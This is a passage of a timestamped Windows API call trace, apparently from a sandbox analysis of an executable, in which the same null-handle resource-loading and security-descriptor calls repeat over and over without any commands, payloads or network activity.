[0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.993] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.993] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.993] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.993] LockResource (hResData=0x0) returned 0x0 [0069.993] FreeResource (hResData=0x0) returned 0 [0069.993] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.994] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.994] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.994] LockResource (hResData=0x0) returned 0x0 [0069.994] FreeResource (hResData=0x0) returned 0 [0069.994] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.994] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.995] LockResource (hResData=0x0) returned 0x0 [0069.995] FreeResource (hResData=0x0) returned 0 [0069.995] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.995] LockResource (hResData=0x0) returned 0x0 [0069.995] FreeResource (hResData=0x0) returned 0 [0069.995] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.995] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.995] LockResource (hResData=0x0) returned 0x0 [0069.995] FreeResource (hResData=0x0) returned 0 [0069.995] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.995] LockResource (hResData=0x0) returned 0x0 [0069.995] FreeResource (hResData=0x0) returned 0 [0069.995] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.995] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.995] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.995] LockResource (hResData=0x0) returned 0x0 [0069.995] FreeResource (hResData=0x0) returned 0 [0069.995] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.995] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.995] LockResource (hResData=0x0) returned 0x0 [0069.995] FreeResource (hResData=0x0) returned 0 [0069.995] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.995] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.995] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.996] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.996] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.996] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.996] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.996] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.996] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.996] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.996] LockResource (hResData=0x0) returned 0x0 [0069.996] FreeResource (hResData=0x0) returned 0 [0069.996] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.997] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.997] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.997] FreeResource (hResData=0x0) returned 0 [0069.997] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.997] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.997] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.998] LockResource (hResData=0x0) returned 0x0 [0069.998] FreeResource (hResData=0x0) returned 0 [0069.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource 